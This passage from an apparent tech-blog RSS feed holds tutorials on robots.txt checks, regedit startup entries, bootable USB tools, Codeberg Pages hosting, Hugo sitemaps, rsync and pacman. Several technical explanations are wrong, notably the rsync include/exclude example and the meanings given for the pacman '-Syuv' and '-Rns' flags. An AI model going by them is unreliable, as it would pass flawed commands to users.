3. **Consider Submitting a Sitemap**: To help search engines better understand the structure of your website, you can also consider submitting a sitemap through search engine webmaster tools. This can expedite the indexing process and ensure that your site&apos;s content is accurately represented in search results.

Remember that changes to your robots.txt file can take some time to propagate across search engines, so it&apos;s essential to be patient and monitor the results over time to ensure that your website&apos;s visibility aligns with your intentions.

## Checking for Removal of Blocked Pages

Once you&apos;ve implemented changes to your robots.txt file to block specific pages or directories from search engine indexing, you&apos;ll want to confirm that the changes have taken effect on both Google and Bing. Here&apos;s how to do it:

### Checking with Google Search Engine

1. **Visit Google.com**: Open your web browser and visit the Google search engine at [Google.com](https://www.google.com/).

2. **Use the &quot;site:&quot; Operator**: In the Google search bar, enter the following command, replacing &quot;yourdomain.com&quot; with your actual domain name:

   ```plain
   site:yourdomain.com
   ```

   This command tells Google to search specifically for pages indexed from your website.

3. **Review the Search Results**: After executing the search, review the search results. Pay attention to whether the pages or directories you&apos;ve blocked in your robots.txt file still appear in the search results.

   - If the blocked pages are no longer listed, it indicates that Google has successfully removed them from its index, and your robots.txt directives are working as intended.

   - If the blocked pages still appear in the search results, it may take more time for Google to process the changes fully. Be patient and continue monitoring the results.

### Checking with Bing Search Engine

1. **Visit Bing.com**: Open your web browser and visit the Bing search engine at [Bing.com](https://www.bing.com/).

2. **Use the &quot;site:&quot; Operator**: In the Bing search bar, enter the following command, replacing &quot;yourdomain.com&quot; with your actual domain name:

   ```plain
   site:yourdomain.com
   ```

   This command tells Bing to search specifically for pages indexed from your website.

3. **Review the Search Results**: After executing the search, review the search results. Pay attention to whether the pages or directories you&apos;ve blocked in your robots.txt file still appear in the search results.

   - If the blocked pages are no longer listed, it indicates that Bing has successfully removed them from its index, and your robots.txt directives are working as intended.

   - If the blocked pages still appear in the search results, it may take more time for Bing to process the changes fully. Be patient and continue monitoring the results.

This method provides a quick and accessible way to verify that both Google and Bing search engines have respected your robots.txt directives and removed blocked content from their search results. Remember that it may take some time for changes to propagate across search engines, so periodic checks can help ensure that your website&apos;s privacy and content control are maintained.

## Conclusion

Controlling search engine crawlers with the robots.txt file&apos;s &quot;Allow&quot; and &quot;Disallow&quot; directives is a fundamental aspect of managing your website&apos;s visibility and content accessibility. Whether you&apos;re safeguarding private sections, conserving resources, or optimizing your SEO, this tool empowers you to take charge of how search engines interact with your web domain. By understanding and effectively implementing the &quot;Allow&quot; and &quot;Disallow&quot; directives, you can navigate the digital landscape with confidence and control.

## References

- [How to Use Robots.txt to Allow or Disallow Everything - searchfacts](https://searchfacts.com/robots-txt-allow-disallow-all/)
- [How to Use Robots.txt to Allow or Disallow Everything - V DIGITAL SERVICES BLOG](https://www.vdigitalservices.com/how-to-use-robots-txt-to-allow-or-disallow-everything/)
- [How to Block Search Engines Using robots.txt disallow Rule](https://www.hostinger.com/tutorials/website/how-to-block-search-engines-using-robotstxt)
- [robots.txt to disallow all pages except one? Do they override and cascade?](https://stackoverflow.com/questions/19869004/robots-txt-to-disallow-all-pages-except-one-do-they-override-and-cascade)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Managing Your Windows Startup Programs with Regedit</title><link>https://ummit.dev//posts/windows/regedit/how-to-delete-startup-program-with-regedit/</link><guid isPermaLink="true">https://ummit.dev//posts/windows/regedit/how-to-delete-startup-program-with-regedit/</guid><description>In the Windows world, to delete startup programs you need to use a tool called regedit, we&apos;ll explain how to use this tool to delete your unwanted behavior!</description><pubDate>Mon, 04 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Your computer’s startup programs can significantly impact its performance and boot time. Sometimes, you might want to remove unnecessary or unwanted startup programs to optimize your system. While there are user-friendly methods to manage startup programs, using the Windows Registry Editor, or Regedit, provides a more advanced and granular level of control, and without using 3rd program. In this guide, we’ll walk you through the process of using Regedit to delete startup programs from your Windows PC.

## What Is Regedit?

The Windows Registry is a hierarchical database that stores configuration settings and options on Microsoft Windows operating systems. Regedit is the built-in registry editor that allows users to view, edit, and manipulate this database. It&apos;s a powerful tool often used by advanced users and IT professionals to make changes to the Windows operating system and installed applications.

## Why Remove Startup Programs?

Startup programs are applications or scripts that launch automatically when your computer boots up. While some of these programs are essential for system functionality, others can slow down your PC&apos;s startup and overall performance. Here are some reasons why you might want to remove startup programs:

1. **Improved Boot Time:** Fewer startup programs mean a faster boot time, allowing you to start using your computer more quickly.

2. **Resource Efficiency:** Unnecessary startup programs consume system resources like CPU and memory, potentially causing slowdowns.

3. **Reduced Clutter:** A cluttered startup can make it difficult to find and focus on the programs you need.

Now, let&apos;s dive into the steps for using Regedit to delete startup programs.

## Deleting Startup Programs with Regedit:

**Note: Editing the Windows Registry can have unintended consequences if not done correctly. It&apos;s essential to follow these steps carefully and make a backup of your registry before making any changes.**

1. **Open Regedit:** Press `Win + R` to open the Run dialog, type `regedit`, and press Enter. This will open the Registry Editor.

2. **Navigate to the Startup Key:** In the left-hand pane of the Registry Editor, navigate to the following key:
   ```plain
   Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
   ```
   This key contains entries for startup programs that apply to all users of the computer.

3. **Identify the Program:** In the right-hand pane, you&apos;ll see a list of entries. Each entry represents a startup program. To identify the program you want to delete, look at the &quot;Data&quot; column, which contains the file path or command for the program.

4. **Delete the Entry:** Right-click on the entry you want to remove and select &quot;Delete.&quot; Confirm the deletion if prompted.

![delete](https://static1.makeuseofimages.com/wordpress/wp-content/uploads/2022/03/delete-option.png?q=50&amp;fit=crop&amp;w=1500&amp;dpr=1.5)

5. **Repeat as Needed:** If you want to remove multiple startup programs, repeat steps 3 and 4 for each one.

6. **Close Regedit:** Once you&apos;ve deleted the desired entries, close the Registry Editor.

7. **Restart Your Computer:** To apply the changes, restart your computer.

## Verifying Changes:

After restarting your computer, the deleted startup programs should no longer launch automatically. You can verify this by checking the Task Manager&apos;s Startup tab or using a third-party startup manager tool. If you encounter any issues or unintended consequences, you can use the backup of your registry to restore the deleted entries.

## Conclusion:

Using Regedit to delete startup programs gives you precise control over your computer&apos;s boot process and resource usage. However, it&apos;s essential to exercise caution when editing the Windows Registry, as incorrect changes can lead to system instability. With this guide, you now have the knowledge to manage your PC&apos;s startup programs effectively and optimize its performance.

## Reference

- [7 Ways to Disable Startup Programs in Windows 11](https://www.makeuseof.com/windows-11-disable-startup-programs/)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Exploring Some Bootable USB Tools: What are they different?</title><link>https://ummit.dev//posts/others/bootable-usb-tools/</link><guid isPermaLink="true">https://ummit.dev//posts/others/bootable-usb-tools/</guid><description>Discover the distinctions between various bootable USB tools and find the right one for your needs. including YUMI, Rufus and BalenaEtcher.</description><pubDate>Sun, 03 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

In the realm of modern computing, the humble USB drive has taken on an incredible new role: that of a portable operating system. Thanks to a collection of versatile tools known as bootable USB creators, you can now carry an entire operating system, recovery toolkit, or diagnostic suite in your pocket. Today, we&apos;re going to dive into the world of bootable USB tools, exploring their features and functions. Whether you&apos;re a Windows enthusiast or a dedicated Linux user, we&apos;ve got you covered.

### Rufus: The Popular choice

**Rufus** is a well-known and highly regarded bootable USB tool, primarily designed for Windows users. It&apos;s known for its simplicity, speed, and reliability. Here&apos;s what makes Rufus stand out:

- **Speed:** Rufus is known for its blazing-fast write speeds. It efficiently burns ISO images onto USB drives, making it ideal for quickly creating bootable media.

- **Compatibility:** While this is a Windows only tool, Rufus does a great job of handling Linux distributions as well. It can handle various image formats, including ISO, DD, and more.

- **Partition Schemes:** Rufus supports multiple partition schemes, including MBR (Master Boot Record) and GPT (GUID Partition Table), allowing you to create bootable media for both legacy BIOS and modern UEFI systems.

- **Open source:** Rufus is an free and open source software, you can visit code on [here](https://github.com/pbatard/rufus)

![Rufus](https://rufus.ie/pics/screenshot1_en.png)

### YUMI: Your Multiboot Solution

**YUMI (Your Universal Multiboot Installer)** is another valuable tool in the bootable USB arsenal. It excels at creating multiboot USB drives, making it possible to carry multiple operating systems or tools on a single USB stick. Here&apos;s why YUMI is popular:

- **Multiboot Support:** YUMI&apos;s standout feature is its ability to create a multiboot USB drive. This means you can have several Linux distributions, Windows installations, and diagnostic tools all on one USB stick.

- **Persistence:** YUMI supports creating persistent partitions, which allow you to save changes and data across reboots. This is particularly useful for creating portable Linux installations.

- **User-Friendly:** YUMI&apos;s interface is user-friendly and easy to navigate, making it a great choice for those new to creating bootable USB drives.

- **Open source:** YUMI is an free and open source software. since YUMI are not store source-code on git place, only can download from official page. [Here](https://www.pendrivelinux.com/yumi-multiboot-usb-creator/)

![YUMI](https://www.pendrivelinux.com/wp-content/uploads/YUMI-exFAT-USB-Boot.jpg)

### BalenaEtcher: Cross-Platform Tools

**BalenaEtcher**, often simply referred to as Etcher, stands out as a cross-platform bootable USB tool. Whether you&apos;re using macOS, Linux, or Windows, Etcher has you covered. Here&apos;s why it&apos;s worth considering:

- **Cross-Platform:** Etcher supports macOS, Linux, and Windows, making it an excellent choice for users who work across multiple operating systems.

- **User-Friendly:** Etcher boasts a clean and intuitive interface, making it easy for beginners and experienced users alike. It&apos;s a &quot;one-click&quot; solution for creating bootable USB drives.

- **SD Card Support:** In addition to USB drives, Etcher can also write images to SD cards, which is handy for creating bootable cards for Raspberry Pi and other single-board computers.

- **Security:** Etcher ensures data integrity by verifying written data, reducing the chances of corrupted bootable media.

![BalenaEtcher](https://assets.website-files.com/636ab6ba0e1bd250e3aaedaf/6384b014d54e42138163c455_etcherPro_SPEED-p-800.webp)

## In Conclusion

When it comes to creating bootable USB drives, the choice of tools is diverse. While Rufus is an excellent choice for Windows users looking for speed and reliability, YUMI excels at creating multiboot USB drives, offering versatility to carry various operating systems and tools on a single drive. On the other hand, BalenaEtcher stands out for its cross-platform support and user-friendly interface.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Codeberg Pages: A Guide to Hosting Static Websites for free and Custom Domain Setup</title><link>https://ummit.dev//posts/web/how-to-host-static-websites-with-codeberg-pages-and-custom-domain/</link><guid isPermaLink="true">https://ummit.dev//posts/web/how-to-host-static-websites-with-codeberg-pages-and-custom-domain/</guid><description>Learn how to using Codeberg Pages to host static websites for free and seamlessly integrate your custom domain. Explore the power of hassle-free web hosting with this comprehensive guide.</description><pubDate>Sun, 03 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## Host with Codeberg Page

Are you looking to host a website without the hassle of renting a server or dealing with complex backend setups? If your website is static, meaning it consists of only HTML, CSS, and JavaScript files, then Codeberg Pages might be the perfect solution for you. Not only can you host your static site for free, but you can also use your own custom domain to give it a personalized touch.

In this tutorial, we&apos;ll walk you through the process of hosting a website with Codeberg Pages and customizing it with your own domain. Let&apos;s dive right in!

## What Are Codeberg Pages?

Codeberg Pages is a feature provided by Codeberg, a hosting platform for Git repositories. With Codeberg Pages, you can easily publish your static websites directly from your Codeberg repository. It&apos;s a fantastic option for projects, blogs, or personal websites that don&apos;t require server-side scripting.

For more detailed information, you can check out the official Codeberg Pages documentation [here](https://docs.codeberg.org/codeberg-pages/).

## Hosting Your Website with Codeberg Pages

### Step 1: Create an Account

Before you can start hosting your website with Codeberg Pages, you&apos;ll need a Codeberg account. If you don&apos;t already have one, head over to [Codeberg](https://codeberg.org/user/login?redirect_to=%2f) and create an account.

### Step 2: Create a &apos;pages&apos; Repository

Codeberg Pages will automatically detect repositories with the name `pages`. To create one, follow these steps:

1. Log in to your Codeberg account.

2. Click on the &apos;+&apos; icon in the upper right corner and choose &apos;New Repository&apos;.

3. Name your repository &apos;pages&apos;. Make sure the repository name is all in lowercase.

Now, your repository is ready to host your website&apos;s content.

&gt;Note : for Codeberg Pages to work, you&apos;ll need at least one HTML file in this repository. Codeberg Pages detects and serves HTML files for rendering web pages, so ensure you have an &apos;index.html&apos;  file.

### Step 3: Set Up Your Git Repository

Now, let&apos;s initialize a Git repository on your local development environment and push your website&apos;s content to your &apos;pages&apos; repository on Codeberg.

1. **Initialize a Git Repository**:

    ```shell
    git init
    ```

2. **Add Your &apos;pages&apos; Repository as the Remote Origin**:

    ```shell
    git remote add origin [your-repo-url]
    ```

3. **Create and Switch to a New Branch Named &apos;pages&apos;**:

    ```shell
    git switch --orphan pages
    ```

4. **Add Your Website&apos;s Files**:

    Make sure to include at least one HTML file (e.g., &apos;index.html&apos;) in this step.

    ```shell
    git add .
    ```

5. **Commit Your Changes**:

    ```shell
    git commit -m &quot;Initial commit&quot;
    ```

6. **Push Your Files to the &apos;pages&apos; Repository on Codeberg**:

    ```shell
    git push origin pages
    ```

Your website content is now uploaded to your &apos;pages&apos; repository on Codeberg, making it accessible via your Codeberg Pages URL. Next, we&apos;ll look at customizing your domain for your static site.

## Adding Your Custom Domain

Now, let&apos;s personalize your website&apos;s domain name. Before proceeding, ensure you&apos;ve already acquired your domain name through a domain provider like Cloudflare or Namecheap. We won&apos;t delve into the domain purchase process here, so let&apos;s begin the customization.

### Step 1: DNS Setting

To use a custom domain with your Codeberg Pages site, you&apos;ll need to purchase a domain from a domain registrar like [Cloudflare](https://www.cloudflare.com/) or [Namecheap](https://www.namecheap.com/).

### Step 2: Configure Your DNS

Next, configure your domain&apos;s DNS settings. Your DNS settings should look something like this:

| Domain             | Type  | Data                                    |
|--------------------|-------|-----------------------------------------|
| `yourdomain.com`     | A     | `217.197.91.145`                          |
| `yourdomain.com`     | AAAA  | `2001:67c:1401:20f0::1`                  |
| `yourdomain.com`     | TXT   | `pages.yourusername.codeberg.page`         |
| `www.yourdomain.com` | CNAME | `yourdomain.com`                         |

Please note that DNS changes can take some time to propagate across the internet.

#### How this working?

- **A (Address) Record**: This type of DNS record maps a domain name to an IPv4 address. In the example:

  - `Domain`: `yourdomain.com` is your custom domain.
  - `Type`: `A` signifies that it&apos;s an IPv4 address record.
  - `Data`: `217.197.91.145` is the IPv4 address to which `yourdomain.com` is mapped.

  When someone enters `yourdomain.com` in a web browser, the DNS system uses the A record to find the corresponding IPv4 address, allowing the browser to connect to the correct server.

- **AAAA (IPv6 Address) Record**: Similar to the A record, this type of DNS record maps a domain name to an IPv6 address, but for IPv6 networks. In the example:

  - `Domain`: `yourdomain.com` is your custom domain.
  - `Type`: `AAAA` signifies that it&apos;s an IPv6 address record.
  - `Data`: `2001:67c:1401:20f0::1` is the IPv6 address to which `yourdomain.com` is mapped.

  This record is used when the client (like a web browser) is using an IPv6 network and needs to resolve the domain to an IPv6 address.

- **TXT (Text) Record**: A TXT record carries human-readable information in a DNS record. In the example:

  - `Domain`: `yourdomain.com` is your custom domain.
  - `Type`: `TXT` signifies that it&apos;s a text record.
  - `Data`: `reponame.username.codeberg.page` contains text information.

  TXT records are often used for various purposes, such as domain ownership verification, email authentication (SPF, DKIM), and more. In this case, it seems to be related to Codeberg Pages and domain validation.

- **CNAME (Canonical Name) Record**: A CNAME record is used to create an alias for a domain name. In the example:

  - `Domain`: `www.yourdomain.com` is a subdomain alias.
  - `Type`: `CNAME` signifies that it&apos;s a canonical name record.
  - `Data`: `yourdomain.com` indicates that `www.yourdomain.com` is an alias for `yourdomain.com`.

  When a user enters `www.yourdomain.com` in a web browser, the DNS system redirects them to `yourdomain.com`. CNAMEs are often used to create shorter, more user-friendly URLs that point to longer or canonical domain names.

These DNS record types play a crucial role in ensuring that when someone accesses your custom domain, they are directed to the correct server and resources associated with that domain.

&gt;For more detailed instructions on configuring your custom domain, refer to the [Codeberg Pages documentation](https://docs.codeberg.org/codeberg-pages/using-custom-domain/).

### Step 3: Create a &apos;.domains&apos; File

To link your custom domain to your Codeberg Pages site, create a file named &apos;.domains&apos; and add three lines to it:

```shell
&lt;your-custom-domain&gt;
&lt;your_username&gt;.codeberg.page
pages.&lt;your_username&gt;.codeberg.page
```

Replace `&lt;your-custom-domain&gt;` with your custom domain name and `&lt;your_username&gt;` with your Codeberg username.

Your final &apos;.domains&apos; file should look something like this:

```shell
mydomain.com
myusername.codeberg.page
pages.myusername.codeberg.page
```

Once you&apos;ve created this file, push it to your &apos;pages&apos; repository.

```shell
git add .domains
git commit -m &quot;Create domain&quot;
git push origin pages
```

### Final Step: Testing Your Custom Domain

It might take a few minutes for your DNS changes to fully propagate. Once that&apos;s done, you can visit your website using your custom domain to see it live. Alternatively, a quick way to check if the DNS changes have taken effect is to visit a site like this [site](enter your domain here). If the results display the IP you&apos;ve pointed to, it means your changes are working.

&gt; **Tips**: If you&apos;re using Cloudflare CDN, make sure your DNS points to Cloudflare&apos;s DNS rather than your specific IP address. Afterward, if you decide to disable the proxy, simply click on the orange icon to turn it grey.

And that&apos;s it! Congratulations on successfully hosting your static website with Codeberg Pages and customizing it with your own domain. Thank you for following these steps!</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Hugo: How to Disable the Sitemap After Generating Your Public Files</title><link>https://ummit.dev//posts/web/hugo/hugo-how-to-disable-sitemap/</link><guid isPermaLink="true">https://ummit.dev//posts/web/hugo/hugo-how-to-disable-sitemap/</guid><description>Discover the distinctions between various bootable USB tools and find the right one for your needs. including YUMI, Rufus and BalenaEtcher.</description><pubDate>Sun, 03 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

If you’re using Hugo, a popular static site generator, you might be aware that it automatically generates certain files, such as sitemaps, to enhance your website’s functionality and search engine optimization. However, there are cases where you might want to disable the sitemap generation. In this article, we’ll explore how to disable the sitemap in Hugo after generating your public files.

## Why Disable the Sitemap?

Before we dive into the how, let&apos;s briefly discuss why you might want to disable the sitemap in Hugo:

1. **Customization**: You might have specific needs for your website&apos;s sitemap structure that Hugo&apos;s default sitemap generation doesn&apos;t fulfill. In such cases, you can choose to disable Hugo&apos;s sitemap generation and create a custom sitemap yourself.

2. **Reducing Files**: If you want to reduce the number of files in your public directory or keep it clean, disabling the sitemap can help accomplish this.

## Steps to Disable the Sitemap in Hugo

To disable the sitemap in Hugo, follow these steps:

### 1. Open Your Hugo Configuration File

Start by opening your Hugo project&apos;s configuration file. This file is typically named `config.toml` or `config.yaml` or `hugo.toml` this is located in the root directory of your Hugo project.

### 2. Add `disableKinds` Configuration

Inside your configuration file, locate or add the `[outputs]` section. Within this section, you can specify which Hugo output types you want to disable. To disable the sitemap, you can use the `disableKinds` parameter like this:

```toml
disableKinds = [ &quot;sitemap&quot; ]
```

If you want to disable multiple output types, you can list them within the square brackets. For example, to disable the sitemap, RSS feed, and `robots.txt` file, you can use the following configuration:

```toml
disableKinds = [
  &quot;sitemap&quot;,
  &quot;RSS&quot;,
  &quot;robotsTXT&quot;
]
```

By adding `sitemap`, `RSS`, and `robotsTXT` to the disableKinds configuration, you have effectively disabled the generation of the sitemap, RSS feed, and the robots.txt file in your Hugo project.

### Example for result

your result should look like that:

```toml
# Example Hugo Configuration File
# -------------------------------

# Basic Site Configuration
baseurl = &quot;yourdomain.com&quot;
title = &quot;My Pages&quot;
theme = &quot;mytheme&quot;

# Disable Output Kinds
disableKinds = [
  &quot;sitemap&quot;,
  &quot;RSS&quot;,
  &quot;robotsTXT&quot;
]
```

This example demonstrates a simplified Hugo configuration file with some common settings, including the base URL, site title, theme, and the disabling of specific output kinds as discussed earlier in the article. You can customize these settings according to your actual Hugo project&apos;s configuration.

### 3. Save the Configuration File

After adding or modifying the `disableKinds` configuration, save the changes to your configuration file.

### 4. Rebuild Your Hugo Site and Verify

To apply the changes and disable the sitemap, you need to rebuild your Hugo site. Open your terminal or command prompt, navigate to your Hugo project&apos;s root directory, and run the following command:

```shell
hugo --logLevel debug
```

Hugo will recompile your site with the updated configuration, and the sitemap will no longer be generated in the `public` directory.

### Delete absolutely
However, if you find that the sitemap file still exists in the `public` directory after running the command, you can take additional steps to remove it:

```shell
cd public &amp;&amp; rm -rfv * &amp;&amp; cd .. &amp;&amp; hugo --logLevel debug
```

This one-liner combines the commands to navigate to the public directory, remove its contents, return to the project&apos;s root directory, and rebuild Hugo with debug output in a concise and visually appealing manner.

## Conclusion

Disabling the sitemap in Hugo is a straightforward process that allows you to have more control over your website&apos;s output. Whether you have specific SEO requirements, customization needs, or simply want to keep your `public` directory cleaner, Hugo&apos;s flexibility makes it easy to achieve your goals.

## See also

In order to be added to the search engine completely unknowingly, check out this article:

[Search Engine Crawlers: A Guide to custom robots.txt with Disallow or allow Rule](/en/blog/web/search-engine/how-to-block-search-engine-with-robots.txt-and-custom/)

## References

- [Customize sitemap in Hugo Website](https://codingnconcepts.com/hugo/sitemap-hugo/)
- [Turn Off sitemap.xml - HUGO discourse](https://discourse.gohugo.io/t/turn-off-sitemap-xml/6912)
- [Disable page from sitemap - HUGO discourse](https://discourse.gohugo.io/t/disable-page-from-sitemap/37213)
- [Sitemap templates - HUGO](https://gohugo.io/templates/sitemap-template/)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Rsync: A Comprehensive Guide</title><link>https://ummit.dev//posts/linux/tools/rsync/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/rsync/</guid><description>Explore the power of rsync, a versatile tool that efficiently synchronizes data between different locations, ensuring your files are up-to-date and organized.</description><pubDate>Mon, 28 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Why Rsync?

In today&apos;s fast-paced digital world, the need to efficiently synchronize data across various devices, servers, or locations is more crucial than ever. Whether you&apos;re a tech enthusiast, a system administrator, or a regular user, rsync is a powerful tool that can simplify and streamline the process of data synchronization. exploring what it is, how it works, and how you can make the most out of it to keep your data up-to-date and organized.

## What is Rsync?

Rsync, which stands for &quot;remote synchronization,&quot; is a command-line utility available on Unix-based operating systems like Linux and macOS. It&apos;s designed to synchronize and transfer files between two locations, ensuring that the destination location mirrors the source location. Rsync&apos;s primary goal is to minimize the amount of data transferred during synchronization, making it an efficient tool for both local and remote file synchronization tasks.

## Install Rsync

If you&apos;re using Arch Linux or an Arch-based distribution like Manjaro, you can install rsync using the Pacman package manager. Open a terminal and run the following commad:

```shell
sudo pacman -Sy
sudo pacman -S rsync
```

### Key Features of Rsync

1. **Efficient Data Transfer:** Rsync uses a delta-transfer algorithm that identifies and transfers only the portions of files that have changed. This significantly reduces the amount of data transferred, making it ideal for large files or slow connections.

2. **Network-friendly:** Rsync is optimized for network transfers, and it can work over SSH, which ensures secure and encrypted data synchronization.

3. **Preservation of Attributes:** Rsync can preserve file permissions, ownership, timestamps, and other attributes during synchronization.

4. **Partial Transfers:** In case a transfer is interrupted, rsync can resume from where it left off, saving time and bandwidth.

5. **Versatility:** Rsync can be used for local copying, remote copying, and syncing data between local and remote locations.

### Basic Usage

The basic syntax of rsync is as follows:

```bash
rsync [options] &lt;source&gt; &lt;destination&gt;
```

Here&apos;s a simple example of using rsync to copy files from a local source directory to a remote server:

```bash
rsync -avz /path/to/source user@remote-server:/path/to/destination
```

- `-a`: Archive mode, which preserves permissions, timestamps, and more.
- `-v`: Verbose mode, providing detailed output.
- `-z`: Compress data during transfer to save bandwidth.

### More Usage

1. **Exclude Files:** Sometimes, you might want to exclude certain files or directories from being synchronized. The `--exclude` option allows you to specify patterns or names of files and directories that you want to skip during synchronization. This is particularly useful when you have files that you don&apos;t want to be mirrored on the destination. For example:

   ```shell
   rsync -av --exclude=&apos;*.log&apos; source/ destination/
   ```

   In this example, any files with the &quot;.log&quot; extension will be excluded from the synchronization process.

2. **Delete Extraneous Files:** Keeping your destination in sync with the source also involves removing files from the destination that no longer exist on the source. The `--delete` option ensures that files on the destination that aren&apos;t present on the source are deleted, resulting in an exact match between the two locations. Be cautious when using this option, as it involves data deletion:

   ```shell
   rsync -av --delete source/ destination/
   ```

   With this command, any files on the destination that aren&apos;t present on the source will be removed.

3. **Remote Shell:** Rsync is not limited to synchronizing local files; it can also synchronize data across different machines using various remote shell protocols like SSH. The `-e` option lets you specify the remote shell to be used. For instance, if you&apos;re syncing data between two machines over SSH, you can use the following command:

   ```shell
   rsync -av -e &quot;ssh&quot; source/ remoteuser@remotehost:/path/to/destination/
   ```

   This command establishes an SSH connection to the remote host and syncs the data securely.

4. **Include Files:** The `--include` option complements the `--exclude` option, allowing you to specify patterns for files and directories that you want to include in the synchronization. This is useful when you&apos;ve excluded files using `--exclude` but want to include certain exceptions:

   ```shell
   rsync -av --exclude=&apos;*.log&apos; --include=&apos;important.log&apos; source/ destination/
   ```

   Here, all files with &quot;.log&quot; extension are excluded, except for a file named &quot;important.log.&quot;

Rsync&apos;s flexibility and advanced options make it a versatile tool for various synchronization scenarios. By harnessing these features, you can fine-tune your synchronization processes to match your specific needs while maintaining data integrity and organization.

### Using `--include` and `--exclude` Together

Combining the `--include` and `--exclude` options in rsync allows for intricate control over the files and directories that are included or excluded during synchronization. This advanced approach lets you create fine-grained rules to tailor the synchronization process to your precise requirements.

For example, consider a scenario where you want to synchronize only Python files (with a &quot;.py&quot; extension) from the source directory while excluding all other types of files. You can achieve this by using the `--include` and `--exclude` options together:

```shell
rsync -av --include=&apos;*.py&apos; --exclude=&apos;*&apos; source/ destination/
```

In this command:

- `--include=&apos;*.py&apos;`: This specifies that only files with a &quot;.py&quot; extension should be included in the synchronization.
- `--exclude=&apos;*&apos;`: This indicates that all other files and directories should be excluded from synchronization.

As a result, rsync will copy only the Python files from the source directory to the destination directory, while ignoring all other files.

This combination of options is incredibly powerful and allows you to create complex rules for inclusion and exclusion. You can adapt this approach to various scenarios, such as syncing specific file types, excluding certain directories, or customizing synchronization based on your data organization needs.

By mastering the use of `--include` and `--exclude` together, you unlock the full potential of rsync&apos;s flexibility and precision in data synchronization.

### Comprehensive Synchronization with Multi-Include Options

To illustrate the power of rsync&apos;s multiple options, let&apos;s explore a scenario where you want to synchronize a range of files while adhering to specific rules. Consider the following command:

```shell
rsync -av --prune-empty-dirs \
--include=&quot;*&quot; \
--include=&quot;*.c&quot; \
--include=&quot;*.h&quot; \
--include=&quot;*.json&quot; \
--exclude=&quot;*&quot; \
source/ destination/
```

In this example:

- `--prune-empty-dirs`: This option ensures that any empty directories on the destination side are removed after synchronization, maintaining a tidy directory structure.

- `--include=&quot;*&quot;`: This rule encompasses all files and directories, forming the foundation for the synchronization.

- `--include=&quot;*.c&quot;`: This rule extends the synchronization to encompass files with the &quot;.c&quot; extension.

- `--include=&quot;*.h&quot;`: This rule further expands the synchronization to cover files with the &quot;.h&quot; extension.

- `--include=&quot;*.json&quot;`: This rule introduces synchronization for files with the &quot;.json&quot; extension.

- `--exclude=&quot;*&quot;`: This rule acts as a final filter, excluding any remaining files or directories that haven&apos;t been specifically included.

#### How this work?

With this configuration, the rsync command executes the following steps:

1. The inclusion of `--include=&quot;*&quot;` ensures that all files and directories are initially considered for synchronization.

2. Files with &quot;.c&quot; and &quot;.h&quot; extensions are then encompassed due to the `--include=&quot;*.c&quot;` and `--include=&quot;*.h&quot;` rules.

3. Additionally, files with a &quot;.json&quot; extension are also included based on the `--include=&quot;*.json&quot;` rule.

4. Finally, the `--exclude=&quot;*&quot;` rule ensures that any files or directories not covered by the specific inclusion rules are excluded from synchronization.

By combining these options, rsync provides a powerful mechanism to orchestrate complex synchronization scenarios while maintaining granular control over the data being transferred. Whether you&apos;re managing code files, documents, or multimedia assets, rsync&apos;s multifaceted options empower you to tailor synchronization to your exact requirements.

### Conclusion

In the realm of data synchronization, **rsync** stands as a versatile and efficient tool that simplifies the process of copying and updating files between different locations. Its ability to transfer only the changed portions of files, along with preserving attributes, makes it a go-to choice for various scenarios, from basic local file copying to complex remote data synchronization. By understanding the core concepts and mastering the various options, you&apos;ll be equipped to leverage rsync&apos;s capabilities to keep your data organized, up-to-date, and readily accessible.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>The Ultimate Guide to Pacman Package Manager Commands on Arch Linux</title><link>https://ummit.dev//posts/linux/distribution/archlinux/archlinux-pacman-commands/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/distribution/archlinux/archlinux-pacman-commands/</guid><description>Learn the essential Pacman commands for installing, updating, and managing packages on your Arch Linux system. Master the art of software management with this comprehensive guide to Pacman, the powerhouse package manager.</description><pubDate>Mon, 28 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

If you&apos;re an Arch Linux user, you&apos;re undoubtedly familiar with Pacman – the powerhouse package manager that defines the Arch Linux experience. Known for its speed, efficiency, and simplicity, Pacman is your go-to tool for installing, updating, and managing software on your Arch Linux system. In this comprehensive guide, we&apos;ll take you through the essential Pacman commands that are pivotal for efficient system management.

### Installing Packages

To install new packages on Arch Linux, open your terminal and use the following command:

```shell
sudo pacman -S package_name
```

Remember to replace `package_name` with the actual name of the package you want to install.

### Updating the Package Database

Before adding new packages or updating your system, it&apos;s crucial to update the local package database. Execute the command below to achieve this:

```shell
sudo pacman -Sy
```

The `-Sy` flag syncs your package database with the latest information from the Arch Linux repositories. This step should be your initial action after adding new repositories.

### System Upgrade

Regular system updates are essential for the security and stability of your Arch Linux system. Use the command below to initiate a full system upgrade:

```shell
sudo pacman -Syu
```

The `-Syu` flag combines package synchronization and system upgrade. This is the command to remember for routine system updates.

```shell
sudo pacman -Syuv
```

For a more comprehensive update, including packages that require manual intervention, use the `-Syuv` flag.

### Removing Packages

When it&apos;s time to bid farewell to a package, you can remove it with the following command:

```shell
sudo pacman -R package_name
```

This command removes the package while retaining its configuration files.

```shell
sudo pacman -Rs package_name
```

If you&apos;re looking to remove a package along with its no-longer-needed dependencies, use the `-Rs` flag.

```shell
sudo pacman -Rns package_name
```

For a more thorough cleanup that also removes dependencies that were installed as requirements but are no longer necessary, go with the `-Rns` flag.

### Querying Package Information

To check if a specific package is installed on your system, run the following command:

```shell
$ pacman -Q linux
linux 6.4.12.arch1-1
```

For detailed information about a specific package, including its version, description, and installation date, use:

```shell
$ pacman -Qi linux
Name            : linux
Version         : 6.4.12.arch1-1
